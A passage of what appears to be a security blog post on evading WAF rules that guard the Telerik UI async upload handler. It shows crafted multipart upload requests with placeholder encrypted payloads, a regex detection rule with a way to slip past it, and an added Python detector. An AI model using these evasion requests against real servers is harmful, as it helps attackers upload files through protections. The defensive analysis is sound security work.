box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: 
border-box; color: #ff5500;">/Telerik.Web.UI.WebResource.axd</span> <span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">User-Agent:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Mozilla/5.0 (X11; Ubuntu; Linux x86_st64; rv:75.0) Gecko/20100101 Firefox/75.0</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> */*</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Language:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> en-US,en;q=0.5</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 
close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 2444</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="rauPostData"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">ATTu5i4R+ViN[Encrypted rauPostData Payload in base64]AmUFAlzLUg==</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 
0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Test_Test</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="fileName"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span style="background-color: #fcff01;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="type"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">rau</span></span><br /><span 
role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="metadata"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 
0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_12421498329494.txt"}</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f--</span></pre><p cid="n85" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n127" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n140" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 
0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Thu, 07 May 2020 14:29:31 GMT</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 666</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":18,"DateJson":"2019-01-02T03:04:05.067Z","Index":0},"metaData":"[Base64 Metadata]" }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><p cid="n108" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", 
"Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n148" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i><u>It works!</u></i></span></p><p cid="n148" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Telerik UI also accepts the "<i>type</i>" parameter as a body parameter of the "<i>multipart/form-data</i>" file upload request, which nullifies a <i>WAF</i> rule that only checks the URL query string parameters of the request.</span></p><p cid="n150" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The discovery of this behavior required the client's security engineers to change their approach to rule development: to block this vulnerability it is not enough to check the contents of the query string; the body of the POST request must be checked as well.</span></p><p cid="n146" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: 
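border-box;"></p>
<p>The three bypasses above (URL encoding, case variation and a "type" field moved into the multipart body), together with the "rauPostData" field that the next rule targets, all come down to normalizing and then inspecting both the query string and the body. The following Python is an added example written for this post, not the client's WAF rule or Telerik's code; the request samples, the host-less targets and the build_multipart helper are constructed, and the percent-encoded "type" values are assumed variants of the URL-encoding bypass.</p>

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example (not the WAF rule from the post): one normalizing inspection that
# applies the lessons of rules 2 to 5: URL-decode, lower-case, and look at the
# multipart body as well as the query string for the "type=rau" / "rauPostData" markers.

MAX_DECODE_ROUNDS = 3  # bounded: nested encodings are unwrapped, but the loop cannot spin forever


def normalize(value: str) -> str:
    """URL-decode until the value stops changing (bounded), then lower-case it."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def query_params(target: str) -> dict:
    """Query string of a request target -> {normalized name: [normalized values]}."""
    params: dict = {}
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        params.setdefault(normalize(name), []).extend(normalize(v) for v in values)
    return params


_BOUNDARY = re.compile(r'boundary=("?)([^";]+)\1', re.IGNORECASE)
_FIELD_NAME = re.compile(r'(?:;|\s)name="([^"]*)"', re.IGNORECASE)  # skips filename="..."


def multipart_parts(content_type: str, body: bytes) -> dict:
    """multipart/form-data body -> {normalized field name: normalized value}; {} if not multipart."""
    match = _BOUNDARY.search(content_type)
    if not match:
        return {}
    delimiter = b"--" + match.group(2).encode("ascii")
    parts: dict = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter reached
            break
        head, sep, value = chunk.partition(b"\r\n\r\n")
        if not sep:
            continue  # malformed part without a header/body separator
        found = _FIELD_NAME.search(head.decode("latin-1"))
        if found:
            parts[normalize(found.group(1))] = normalize(value.rstrip(b"\r\n").decode("latin-1"))
    return parts


def inspect_request(method: str, target: str, headers: dict, body: bytes) -> list:
    """Return the reasons a request matches the RAU upload handler markers, [] if none."""
    reasons = []
    params = query_params(target)
    if "rau" in params.get("type", []):
        reasons.append("query: type=rau")
    if "raupostdata" in params:
        reasons.append("query: rauPostData")
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    if method.upper() == "POST" and "multipart/form-data" in ctype.lower():
        parts = multipart_parts(ctype, body)
        if parts.get("type") == "rau":
            reasons.append("body: type=rau")
        if "raupostdata" in parts:
            reasons.append("body: rauPostData")
    return reasons


def build_multipart(boundary: str, fields: dict) -> bytes:
    """Constructed helper that assembles a multipart/form-data body for the samples below."""
    out = b""
    for name, value in fields.items():
        out += f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
    return out + f"--{boundary}--\r\n".encode()


BOUNDARY = "---------------------------62616f37756f2f"
MULTIPART = {"Content-Type": f"multipart/form-data; boundary={BOUNDARY}"}
RAU_FIELDS = {"rauPostData": "[Encrypted rauPostData Payload in base64]", "file": "Test_Test"}

# Constructed samples mirroring the requests in the post (no real hosts or payloads).
SAMPLES = {
    "url-encoded": ("POST", "/Telerik.Web.UI.WebResource.axd?type=%72au", MULTIPART, build_multipart(BOUNDARY, RAU_FIELDS)),
    "double-encoded": ("POST", "/Telerik.Web.UI.WebResource.axd?type=%2572au", MULTIPART, build_multipart(BOUNDARY, RAU_FIELDS)),
    "mixed-case": ("POST", "/Telerik.Web.UI.WebResource.axd?type=raU", MULTIPART, build_multipart(BOUNDARY, RAU_FIELDS)),
    "body-param": ("POST", "/Telerik.Web.UI.WebResource.axd", MULTIPART, build_multipart(BOUNDARY, {**RAU_FIELDS, "type": "rau"})),
    "benign-upload": ("POST", "/upload", MULTIPART, build_multipart(BOUNDARY, {"file": "hello"})),
}


def classify_samples() -> dict:
    """Run every constructed sample through inspect_request."""
    return {name: inspect_request(*req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, reasons in classify_samples().items():
        print(f"{name:15s} -> {'BLOCK (' + ', '.join(reasons) + ')' if reasons else 'allow'}")
```

<p cid="n146" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: 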
border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b><u>- 5th WAF Rule: RegEx Woes</u></b></span></p><p cid="n112" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">To also block the requests that do not carry any parameter in the query string, regular expressions were used to check the content of the request body.</span></p><p cid="n158" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">In particular, the focus was placed on blocking all requests carrying the "<i>rauPostData</i>" parameter, which contains the encrypted file upload metadata, either in the URL query string or in the request body.</span></p><p cid="n160" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", 
"Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The check within the body of the request was performed using the following regular expression, after normalizing and transforming to lower case its content:</span></p><pre cid="n171" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">.*name=.?.?raupostdata.*</span></pre><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"></span></p><p cid="n152" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This rule blocked a 
request if performed using the regular syntax to insert a "<u><i>multipart/form-data</i></u>" parameter. </span></p><p cid="n152" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The image below shows how a regular parameter matches the regular expression. </span></p><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gSJXB-0XvRs/X6fbDtA_XRI/AAAAAAAAAAg/KNihf91Jx6gJK0S0ABLFQZLfVmlm0doqgCLcBGAsYHQ/s1113/regexmatch.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="344" data-original-width="1113" height="179" src="https://1.bp.blogspot.com/-gSJXB-0XvRs/X6fbDtA_XRI/AAAAAAAAAAg/KNihf91Jx6gJK0S0ABLFQZLfVmlm0doqgCLcBGAsYHQ/w577-h179/regexmatch.png" width="577" /></a></div><span style="background-color: white;"><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span style="background-color: white;"><br /></span></p></span><p style="text-align: left;"><span style="background-color: white; font-family: times; font-size: medium;">However, the regular expression check can be bypassed. 
The weakness of this check lies in the central portion of the expression, which allows at most two characters <i>(".?.?")</i> between "<i>name="</i> and "<i>raupostdata</i>". If three spaces are added between the strings and the quotes are removed, the expression no longer matches, as shown below.</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vb5LVz2YYwQ/X6fbN02N_AI/AAAAAAAAAAk/VyQsmqa-l_0arf4ohI5LQviVraQ4Z1lowCLcBGAsYHQ/s1574/regexfail.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="1574" height="161" src="https://1.bp.blogspot.com/-vb5LVz2YYwQ/X6fbN02N_AI/AAAAAAAAAAk/VyQsmqa-l_0arf4ohI5LQviVraQ4Z1lowCLcBGAsYHQ/w573-h161/regexfail.png" width="573" /></a></div><br /><p></p><p cid="n106" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">With this modification the parameter was still considered valid by the web server, allowing the file upload once again.</span></p><p cid="n107" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Request:</span></p><pre cid="n108" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: 
inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;">/Weblink/Telerik.Web.UI.WebResource.axd</span> <span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">User-Agent:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Mozilla/5.0 (X11; Ubuntu; Linux x86_st64; rv:75.0) Gecko/20100101 Firefox/75.0</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> */*</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Language:</span><span class="cm-string" style="box-sizing: border-box; color: 
#aa1111;"> en-US,en;q=0.5</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 2473</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; 
padding-right: 0.1px;"><span style="background-color: #f8f8f8;">Content-Disposition: form-data; </span><span style="background-color: #fcff01;">name= rauPostData</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">ATTu5i4R+ViNFYO[Encrypted rauPostData Payload in base64]9TB0pfAmUFAlzLUg==</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Test_Test</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="fileName"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br 
/><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="type"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">rau</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: 
